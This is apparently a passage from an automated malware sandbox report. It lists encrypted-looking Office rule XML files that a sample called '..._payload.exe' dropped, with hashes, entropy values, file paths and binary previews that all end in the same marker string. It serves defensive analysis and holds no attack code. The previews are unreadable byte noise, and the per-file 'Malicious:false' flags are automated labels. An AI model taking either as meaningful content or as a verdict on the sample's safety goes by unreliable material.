                                                                                                      Category:dropped
                                                                                                      Size (bytes):810
                                                                                                      Entropy (8bit):7.744416161206425
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:j3NkPMpSUZ95xoMfbbD0brshtFcB9LiBdcK99MMjionO9ui5HSiDKl+mo7ueUv6X:j9t9RcStiB9LECK9TgHDKl+mEueUv6bD
                                                                                                      MD5:298860DB0B7B40B2771D84FC1F72D7A0
                                                                                                      SHA1:56EEA8882CC370E5312CC87AEE40310CAF99A898
                                                                                                      SHA-256:70C858F051B87DC5A57E323871C47A2BC93600D24AC54CB6A5EEA0A61A079D0C
                                                                                                      SHA-512:75901D695B2A22D334F4AFD36ADEF21A66ED8B7E3BC4F066A3A769F2E5DA85CF99FEA94E0A63D8A7223B6B012F4852EA99E8A48DBA042BADAAD182568ACB7C83
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Z%.X.}.B..o.)...83-9z.(5.......nM]w>.]....;..J..>...].t#.D........7....?.SJo......C(v...... /..d8."..'z.@......4.F..l.'&......L?...Q..<..t-.b.....u.._4.......O./.4..)..w...*...ZF?\Q.>.H.tX.....}l...c.^.C.s..hU...$rE.K......v..Ye`K...1......"....6.U&..6.o.......d..g-..3.P..Q.2D...`...E.[T..j..{..l..`I..{.|v..k....:..u:.y.q..N)...w.2._..R..G..U..i...v[..5.c.A+NX..?~.8.....;... .U.}d......>.......cx,.G.C...........oF.k.&u3a.G..r.........Yv.Fz?R..........l.........x{r.x..wt.O..q.S....98M..!.O.......<....4.XO'9..&.R..3$.He.@gy.I.{7...L;9....%1~...E...V.../:...[I.:..g0..*X.z..z....JJ.K-..LHg.3ZMx.1x/O.:....m..B.........1.l.K.l..a.....R.O../.^.(..>.!YC..F.I..fYTU.v...*.<.q....d...z....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120655v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):752
                                                                                                      Entropy (8bit):7.67397417641423
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:1n5bpXqwSOWeNPD4MpmkuiE1UodRwtntw6QMm4p5KxvVF82qLv6cii9a:ljiy4MpE1UMEnbp5O9F8nv6bD
                                                                                                      MD5:0E1101DAACA25FC1DFC3B8EF8D42BA9E
                                                                                                      SHA1:42EB95495E5C4668DA23B0BB84B5178D43C89B63
                                                                                                      SHA-256:F631BFA349CE66DAF3916F7DAC52D05F2B248F152743D736388ED8F29A6C11AD
                                                                                                      SHA-512:F930CF7EA4265E4934F1851FAAAC50F279CC1C2116A2493B5EC63A95E0C0D8FD720F845BE5706D262DB3B80C42C31730A268B4F2D100165B06EF2A08166476FF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml@..k$..9U#i.?.no9pZ.......d..b(...1...T.))..~..5.q..>.NV....^..-./.:..i.U.(.....@...{E.^....p........j.l....$.<.O..l...3.....'....g......]..<7HjHj.....:..YY{...........'qK...%.44....@........a.!..,.VL.Fw..I|.;Al....L.._>.JMJk...&.V..9....k.....{..;..0vD.cK..L..B........4...D..U..V.d...."./...=.e.....J....H%...B(c....4E7.^O,.s.T.O..1.#.....u' ....2.&.xxA.M..HT....x.~..&....n..Q.....2.a.I.!j...'.....\....5.9..%.7.H../.!..2W..|...j\e..G+.H...s...D.-@2..&......{~v..`|...0.3?XO.4..........RXN.5G..).c..5..h..~^.%.V.x.Z[m......w7....$j..O....k..k.A.;S..._..r;.~.Z.......y.)#SFW..(<..D"...]..,O...30.l..o..F.xn.Q1W.h...I...4 .....2..W.....'hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120656v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):810
                                                                                                      Entropy (8bit):7.700853445471699
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:YZAkVWCdYmAPeAiX7tk1CJ3oDMLqMrW0qgKn1Z8f1Nfv6bD:YZA9nPSXRk14+9AC1GfwD
                                                                                                      MD5:DA2EF58E6E843DF42744F95FC2E3E502
                                                                                                      SHA1:3303154D1FA3BE5D01F28D06CDE3CD49190B9095
                                                                                                      SHA-256:EB84ED8EB57ADD01F5D24FC91BA13C0B427F24103A6478A9459B39127C35DC68
                                                                                                      SHA-512:784C560B7D4F0EA35D0092ED6142A39C1CE0CE9EFBBD49F0D3FDF13BEC8B5EB4C46D19877F50776D37E74B22FCBB04636EF3BB80CFD8B394038EE60F3438DC3C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.%j....M._.p.CK..;:...j......f..$)...#..>.#.....K...(....o..u....I...J.z.||....G..2.(.F..u.U.37....\Sh.3..B.....=-.W.\.%......R.`f.d.T..h..TC.;L.x.@.S.'.O8S.s..>b..20.<.eC..:.....V..o..Z..!>...B/....cf..813...:.Y.u../.N3`.`I.am^wBO...A..]j.....t..N#.Y/.....>........I7G._..C.n....A.Ba.m...l l...[..SO...;....`:..~.O(G.\..^'.............-..9+..4nw..a..1.i\.....c.\.x@....9.?..#.....0..E.k{.....Vc.a}..f.L...1#../.......i..|...r..<......Y.B./>N....X..0.Qdk....~.h..Y.l....d6.u.B.B.{.t^...E....5.U!.]t..:........M~...Ha-_D..-.9.B[..2A..6.>g.3".h..*.....[Y.r7..*.(.Kv..!%.MI...M.h.F.Q..OE.lB..>YH..x....izh?...z.....hz'2o..9/......=kWx.._.Ei.k.. )....%...a.wu..W..-B."~. ...+@.k.CP......Q..D.lChZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120657v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):752
                                                                                                      Entropy (8bit):7.649386111260406
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:bte6CHf7BKTRy+odBOu+D8dROd2ouW2kBiNsL9OU0wfRzuG8MTuAOwDubgNv6ciD:btbMTB8y+2O3iQiW2khwezTTuA1Nv6bD
                                                                                                      MD5:160101FD05590ADB84FE94B050B9B580
                                                                                                      SHA1:3E9E42B3EBCCFFCFB7E7192EB971BBAC70BA57E2
                                                                                                      SHA-256:AC31AE913C7DF812C03690F910593968B1C5926EA2BFFF41E8900B11EE5A594B
                                                                                                      SHA-512:BB89BF0E081C4ECEFAF30FC9C065979D2C0BD0DBA9733FBE35BA1E47D677B14B3DEE7D11D11596A9B3BE2F31FA021334ABDF39B39B56E4ED7460FF1D71F4A37A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.0...%.v.z.(.../........6....N....|gH.._.....~W.Jm?......-.KM.B..mrC..E[..K...D...Ft....J.....-..}~!........F-...Z...M4.K=H.F......hzK..e.r...4..T...A..$.R.k.g.S)...:2._OGY.>....H...*...[k.L.b.8.......rK..)...w#.Z%.1.@...<.+.G..t....-]..I%*.4.I&S...E}v....M.H...V.....b../I9Rq.O...:*s..i./..Y/y.A`4.'..o.p".G..i.].M.......{.R.FU&.....M./.:qt..#R0u.....;o........>.".6r.K..-. .......r.'s2n..$Cc.$KK.ux.!8.}?..Iw...6........~2...{.).!.5...m....n..2TR8f..B[e`...g.~...=.-..X..-..^H...e..1.A~.....".->.{&~Ka..[ ..!.T4Mw...F|...!..6.z-.#[.......K........-..)..^a..Ku.....h.4p....3....wb.A&.Z..Y. ..D..q.$...l...X?Ka..>8.^..;.>...'m.PI...S.v.0ehZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120658v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):805
                                                                                                      Entropy (8bit):7.704450431349972
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:B4WKvaJaVxI6BfulMcVMYsCcWpSt7v6bD:B4WKCaVxI4GFsCj+7wD
                                                                                                      MD5:4083995E40AD609D83191E7679D129D9
                                                                                                      SHA1:04C5C777C0DB12943F60B0EB6CCDC7F4736A32D2
                                                                                                      SHA-256:785CBD09B08ECF962C3DC5B3561EE7AC385AFD46766E034B720E1AC4555F0C06
                                                                                                      SHA-512:ED86AAAC8D7D8833A6B09F0A21081BB12C12CC9D19DCA62D61FC54E420366B0CE8FEC0BBCFA919BF773CBFD51CB97553D06D521B0977D2AFAB42432C90598F50
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...x..}Z.(..<...VwaY...U.s..*..5j.[.VA..H4..h...(..9\..E..H+..(....#..9 =^N.F..Cuv.&U.A/OW.JG...*...U._.....l..#UF......b........[....c.._..w./..{.@.;.[....?...[.~m.=,....e3.h=*j.L.9.....`..uX...zj...........8..'d..+....51.'q:..^`.-..b..p..-<50.).M.....8.."k.p.jx..up......S~Z...xq....xl.H@..w.i./m.w>..U.f9..#.JWQ.....K...\q5.Vtl...J.....a/.Y.Q"....r...v@.}....t.Y..m..!..F.y...X......v.Z...\..``.Pr.Y...o4.f..H..u...$..".:..}.Z..=.,..p..H81f..M.v).|.o7X...t&0.p.j..tD...^.a.?.I..N....*..N..A.!t..4.1?..yZ.AOf.....T.{...Y@.0j..[$...$.h........tlZ0..V.&....[4..saW.............v.R)......z.X.,fH..l<....Dh...WH='.mfr<.#....+.@A2jr....v..._FV.6n.b.[..m.z.ug;.o2........0.>.XH......g.4.....(phZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120659v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):801
                                                                                                      Entropy (8bit):7.697352206133964
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:HfS8Tx800wyyk0pJtmufZ9FGzv1Sav6bD:Hl830nntwEawD
                                                                                                      MD5:1415012E6E5B13F60A486FC0AADD736F
                                                                                                      SHA1:DAC021D9A4691912AF95E22B9239B66298D9819B
                                                                                                      SHA-256:7403C0C5E2487DAB94464BF9C6AD7BADE6F51851C998573C04F095FA10F44880
                                                                                                      SHA-512:B438F1C4EC93076A86A708DED46985D89F9CBEF75C3AEBA14D4276CD666A6245C1F610B034FAD621A4C3AC1EF8446DDEC9A7035C3DE5C62B893934222EBCD9AE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.vQ6.....T.G.O....1."!.....nmuh.5..C....1.V........x.e.@.y)....-..2..rP.N.A<..C..@5Q;..+.EEr.1..+q...-.....f..%...*+.....X..;....i.m.^..s.w.........z...|..+...W.4S.D.o....R..e#.WrQ.....`.....E...........'r..k*l4..-j.....s!.!..U3^. .n.Br.B.SK).X..Sr.T.E.~2..j.*.O.s$.y.....`\.#.....W.B..*._.62S.h.)w.....(>...$jX.G.b7..c.t?....h...."..4.D..F2.#-. ..O.W.BD..*.P..c....cS|...mcr"t.!~ZHy..O.^?.....}...^..W...."...!\.|.G.G...Q..~.2i....E..}.!.0s.;.t.....2+.....;=....+..-..+....4.....:.7.A|..M..`x..nZ...X...3Q....Z`.i..e...[-${.b.t.. .[.S{.H.O>..5..=..P.I%{.h..:..".O..t..IZy.......C.M.o..'........R..w..Y.i.......&8.[.m.h@..Ra...{q!l.R.....M]\_I![.A.1.S.......S.......,..L%..Y.F..shZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120660v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):818
                                                                                                      Entropy (8bit):7.721209298502107
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:jikI4mQ2nEWAIPp4hzxCatPvhCJhIKfyLjnv6bD:m39noIPp4hYabCU5vnwD
                                                                                                      MD5:A74609DECDBAFC60972C4CB6FEDFB0E1
                                                                                                      SHA1:3A5AEFCE7F59BFD917DEA7878EEC7BE522201B41
                                                                                                      SHA-256:03F3B9DD7DD1B653DAE686CA2B501C68D112DBA5C126285546D70328218DF9A6
                                                                                                      SHA-512:7D4FD3160053FFE66B42982B0DFCB34353EA1F9419D2E974A143CFCB6344B57FF36FB3DEFDD04BB884EC99CCACD27D1CBB37CA9A9BE1057DAB9E42E79C305D60
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.l.w...b..~..$9....>.I...2T...1.H......4e...Q..[.#RM)..}b..F....}...u....^U..h..);k..eyp.Dd5.2n?.6.8X.KCo?}..n.............2.84c!@..XtF.J4....M..x..3..l......A.W..`{B!j...Z...........0..B...M..... g.9.`.....j...8.,;m>..*.....Ic....#t.4....e=N..[= ..%...wvW..y..g?.....&.7h..?LJ....[....3.N=(j.C...H8..c%....GX.u.'D#}...P.........u.. .qJ.........s..";m....B6.P..p.pXl..8-.7("x.fI..h$.L6..R.+..um........Tl?.....-....N)....0..5.z..}...R7)_eW.'..42.q\.1./.R...{\J6O..F.G.X..N.."..........-.Ra..b.2..6[..n..1...l.....~..6W.I.e)....+aD...........>-sp.\8.0r0.w*.j.K...Z....Sa.A..2...l....9>.V.P$<b... .M.X.............?E.......n.M..lq....a?V..5I......<.e....4..U..$..W/.;..p%.gF..;..4..p.arg.2..n....R..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120661v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):744
                                                                                                      Entropy (8bit):7.715921435056596
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:duygxJalOMRRWAEzPVXhXyyiez2PKYpsTMPES+9kwEdBEFCthznv6cii9a:jOJalXDpEzPKez2PKqiMPakwa2FCthzs
                                                                                                      MD5:9498A5D1467C23D39C5A555BB691596B
                                                                                                      SHA1:3B32F3DA3A72B03156C47C60170CBE4C4408CF5A
                                                                                                      SHA-256:45B4E86DC261B97E83642D2DDEBC0902F5593F7E5044EF623D19123162BC33D6
                                                                                                      SHA-512:6FE12A4F885C5C1D992B895EC4B2D6EF19D41C1B50DC520486D058C4254D695BD21EB748A61638BF9A1D3C7B1FDCF50AA3A02629CE0385AF43BA47B204DC64A8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....."....}.5B8x.IX.z.g....q.......y..*.!.T.C.F....0K....'...H`....!...%...5...C..m........L..I.w....]:*.B..p.....tk..w..-_...J-...yJ...Ih.Y...#..v..7)4.[u.?...s.ji....oO.]..&1...3=!0z.A.i..@......-.$...?oBCI.b`..Ma.g ....z..X......2.....'._.-].*BX.lo..#.ITy...$c..R+.k.#..(....#m....N.....z.M.\qc._....YJ:8\qE.q......c_L....t%_.m..F.[.t...2.../...l.q'..E..x.:..-...u.......3..K!..:..RG....p .{..C...m-U..`u...e.}Ooq..7...bxA.....6.RP...LU.YX../._...3........(.'.5.q".VH.&]+...6....0.#...~....df6.j...7...K,..;. F9...47.9F=.d...S..T.m1.,.'....-..k; a..._....:..3_..>....)it.M..E..#..W.Y[X...*....O.c.........~..8....$.....#rhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120662v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):803
                                                                                                      Entropy (8bit):7.734464955017956
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:usrXsYX08mmIPVJWxCf6JOEw0WFMAE7IX/8xj/DFpQNVB1+7yFzZgb1jnv6cii9a:uGX95diJIrJO0WGHIPUrQNVvnFmdv6bD
                                                                                                      MD5:EF6917578D45AB51CB1BB67E62E167A9
                                                                                                      SHA1:DEE5CF10A0F8E2980B5EEC116B54B1505E2C28D3
                                                                                                      SHA-256:57AC139CC013863F5F293B89C2B7EE34B07DD605EFFCDAF9F2E42AEB17B32077
                                                                                                      SHA-512:053BF471B36C82C73C39937C334CDDFDE3B78332FB00DDB6BD44F2DE0E5B739ABB2EC0EDCC5E39E04F56923967EF43C4D4760282B097282625614BFEE83F4DF3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Q3.^....2...H.E5H}b....d..6..<.9./...<.6..e."6....I..'............5.. .....!.|3L|..[.[......]./e..uK.....v.3w./Q.Etx.0c..u{Ho.*.3V.s..Q...U.5... 8..K*.H(......q.h]$...1.N...*y....;%....0..u.f.....".4....+@..3....Zq.!.z.[.f.]c/n..._...:...za.F)z...8T.=....h..'...~..l..X......&..@.7.DB...{z......R..5....7._#..C%o..>F5..9..r_.[H....H...,....h...*.`.)....^Ul..#.u.3z.j.....:...D.h.ra..n..)h.w.5..Y..b...s.3./q.e..Jb ....#..0...2..@..B..m.nf{......=.......|aH.a..(T..h..(c.....iK..D....M"..%.:3...Y.r.o.B.St&.....*..}@..V|......:..1kf.F(!...v..-..(9.r...$.6U...Y....8.......^G...eo....@>.L.}......Y.4...a..J.BZzP.......KL~....e..../...on.<|&..Wy 5.....;........W..... }/?[......3...~!...UhhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120663v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):760
                                                                                                      Entropy (8bit):7.643631026051716
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:AkHEpgoXkw8d02APaat/fGtXDo5ZPm6p4PqumkcxFVAqTvnbzVfeL7/kI17/0v6X:ApHkwXriK/e5Dz6WCk6VPbzVfA/d/0vk
                                                                                                      MD5:FE03E6B9836C2F5C28F9D272DB769C65
                                                                                                      SHA1:C29B2EE974F4B56D207C0DC4D13D5F1FD6A35EE4
                                                                                                      SHA-256:91D4D4170BD3C95E36666FDE050077FA36ADA0EE6949EBDCA5C2661B4048244F
                                                                                                      SHA-512:4A9BBDD9775CFA149C498F261ACF67437BB386A6D43B1DBE90DC539C41778D2E3CAC58FE755154B053CCDD6399543B6933C5A2E967F26E9AA63B154A43915A86
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml=.=.....K...M....B....W..].X.<.2./|.:...e.X..d...H5..);@~.6..c.(...pt"....D~.%d.y....dbt.:..+.H.$.bD..[.../..Q...3.n.E..#..F.F.'.3.d.z....`.T.gK.4??.k.M&..B.r....5.Czu| cQ....~gEc...M.....e.......2.C/......l0.....'..$.qL.!..^.}..?.G.Q.$...g.M.BucwF.Nh*....9..Fw]..e$.p=..T.......4.E..t.Ej?...g"D..K.l.q..L).t..d:...5...jJ....D..I.$-L....E...Et?r..4%|.(.+...G.n.FJ....s..0......."f.i..v..[. .`.dl.[..D.wv.k....i...K....L..Q...I.UJ..l_...&...-~..U{.&.........$Z8V......}....}.5KF\O....{.El.&...z[..C.K...4Rz.n..j.R.....0O........i.d(?J...[_.)...E.i..../...8.....<.k.}.\.8..u3......gZV..`S..j#...S.."...J..=...T.tO..M)a..cG.p.f...-."$..R.5..D...:DND/a...fa.s..uhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120664v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):835
                                                                                                      Entropy (8bit):7.752143076706595
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+7YFQb2JIrB5DcxT8/YAg1uh0dYp4nuGWLv6bD:+7FbvxcxT2YAwu8Yp4nuGCwD
                                                                                                      MD5:D8075CCBE65F87C54966731DA9EF592B
                                                                                                      SHA1:C60BD4070E69A577DC1490C95756250A329493EC
                                                                                                      SHA-256:D7E25E6984E7CB0DA9BDC301700E0D2790AC2BB7DDF0256A436B5DC60D681EC5
                                                                                                      SHA-512:2245007DFBCC5A32D3F8407B9CFA9880F902F47194A32E0760FFA4C73969A63BA41D91176AC6946DE947B0B4B818DC8E943DD0518B71EE54D2BD7CE0167AF125
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml{.#.u5....f.6..lB ..J..k}..B..{....D..s3.X.p..H^......i.B!.H.....}E8.kry...C.I.....^....dW^....p...W......f.t/1m).....Sq..+..1..Y.I.........WU.w %.+o$[wAl...f.......7...N.[LQg.C..{...z6..R...>.$G....]'e.T...,......~.........B..I.\[.W|.|.yH.@g.W#.^x.........Y..R~.T....yc.J.7sw.F.F..w....8Q..i...9.o..0..<..-....SU..WVN.......r..x5..]A.h...,..A..].#..~..y...i.8..@.+..@...8..'.+7@...`Gn..0(.T.....'|2..3E..i.~.......E.<..W.i..m.?n..e.Xd...V..>.4.ma4A.PK..`..x..S..h. ..X.x.y.`...8.r*z..&.]..0._.U..T........[.*.vH_..w]Z.5>...._y.E........v..|<2a]d.a.\.TJ...._9.x.z......C..[.I.I.K$...a.Y..^.F..kA..,...Z...6....w'4DL'R...}s....e.9.=.....u......B[.....e.....j........!.FX.......w[..R.eE.K..j.`.......a.e....&.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120665v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):740
                                                                                                      Entropy (8bit):7.747386579111799
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:AGoxXmrl+7cZc3+2LU0K9ieG/ann1mh3WiJCJrpmIVr9cCYiPrmMgv6cii9a:Aal+7ouDU0On23WT7VpcCtgv6bD
                                                                                                      MD5:C030C1395B05B073D46039867344CBB9
                                                                                                      SHA1:EB6122371C6E665DE689BED879CA2F0552C74854
                                                                                                      SHA-256:DE6EEE579E190E65B79F83E79C5199DA8C11791106F1B882D413A5A572297209
                                                                                                      SHA-512:92B2EBCC43327493E2A5E5DE8ED7AA5EFD579A6241B3AEB9C0AFCA42FE4E31122A0D68A73E05D3A7175EF7A7DEBA357FAC365FECE053D93E4E13FCC4E2B42487
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml=.B!..y3h.!o......._./u.FB.....AT.?..N"..\..Vh~.......G....z...~.....5..SRh@$ .,..'..Z.cJ{Hjg......y........t.$......v...l.|V$+..#,sx.....)pEc>xW...m.."Ck...Q.......G.+.......;....Y...>FU.68..#.'.r....HP.Z....`3.S...........x.W.g......n.w.l. 8.I3.J...[,n.1....y.N.:.....9a...q.e.H...9..H..^.MK?*........m.\.m.-b|0..E..QF.n..kx.9.Rt.P..m..$(.#O.Y......k./=.........p_/.m.........&P.s.Mg..o....o..5...d)r..O!...@...?]..z[V.FL....&_...n.u......w{T.2R.$......U..x}..Yq~T.x..f.v..k......!.F-.....kLG.'...b.O0..jW......F.5.....dL%EVf1i.(./..e..4D#.Z.....qKy.29.............__&..FO..w....mx.%..-.w......6..x^...Lw6..5.o..V...9..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120666v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):807
                                                                                                      Entropy (8bit):7.716818617549473
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:7nCx5l8CKwV4Zzv/GAG8QSeXYux2z0Q4XSgypidzN1oHuX1HWylzFzi/Gmifv6cq:7nCxWd/FGAwQ4XcpiAul2ylhrmAv6bD
                                                                                                      MD5:154C61A9BB16E48251A99EE585CE8868
                                                                                                      SHA1:B1512AE4B07065A8D3D7902BFBFDE2F3E76079B2
                                                                                                      SHA-256:FDB404618B84959FABE85EA5CB8530EB95F4A96BAC1925D10794199CB0B7AFB5
                                                                                                      SHA-512:4BE11A53997CACA228B2CA57BAD4E462415CBAF50E0D618777D681D9B2C1A3D14487FA1866DE96804B16887C974263EDF919F66D350BE0A103CA5EC9EB6E9821
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml_.E................2..ik..c...B:$...@k.dJ.....8.^T.`.K..%.K..1..;z.0.....S..L.e...g..:..?..b..].>....z..$6P.7.[.../.._....}.L|.....p._........_XB>A....b.(.q...:....]. O..?...'3!........M........v/>.+Cq..e.......2C.C._.O,]..x.....:.......@1.(...D~.r..Rm....evY...-.....p....0..iN~.c....ZS.n!..Pj%z>....t..7~.<qJ....!G..hm+.,?x.....Q.p.{...<.)`j......$...........wb8.re..Q..y.a`yI..Io...`........a.g\K,..kj]...B.....!i......_..6.F..^..[.-.~.J....d.#.Ag ...5^.N.Q....:T..1.1....R.\....d?..|..f...c~v..I,E.Bi5..#2^..>vZ.h.4..mQ~)>....`..PhW......t.>.d....l.:...9..A..^y8.d.....4..n.BP..n.'..<>......x.a..z.;.~J..@..p'Y....{s..O^.gB.s..?j....8wR..".....9"....`.;....p.v...5........jj)..r......6..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120667v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):741
                                                                                                      Entropy (8bit):7.658472641554552
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:rwC3wWur0OX47vjJoXeaqRUaVXVsIQNh6YdogSQs/PiSbSFRqxBnLdtwsOACf7vk:rhwWuwu4+lqRpDXQ/ljGJYqx1Ldty7fw
                                                                                                      MD5:4FBB5B825499252B593FEC423E685C2A
                                                                                                      SHA1:CB93D05DC6A17FF6FD79B9C3E7146E694200E565
                                                                                                      SHA-256:50DC424607985693EAA4E5DEAEBDE4C57D0272BD7EF40C9B45EA1AC815053073
                                                                                                      SHA-512:4455078DB76C4A105F25C18772720BF0D124452267CBAE206E3D6979133E6A38E17C7835BF53A137C2316220DC56763F57F3930F6BCD184217D2943E0030716B
                                                                                                      Malicious:false
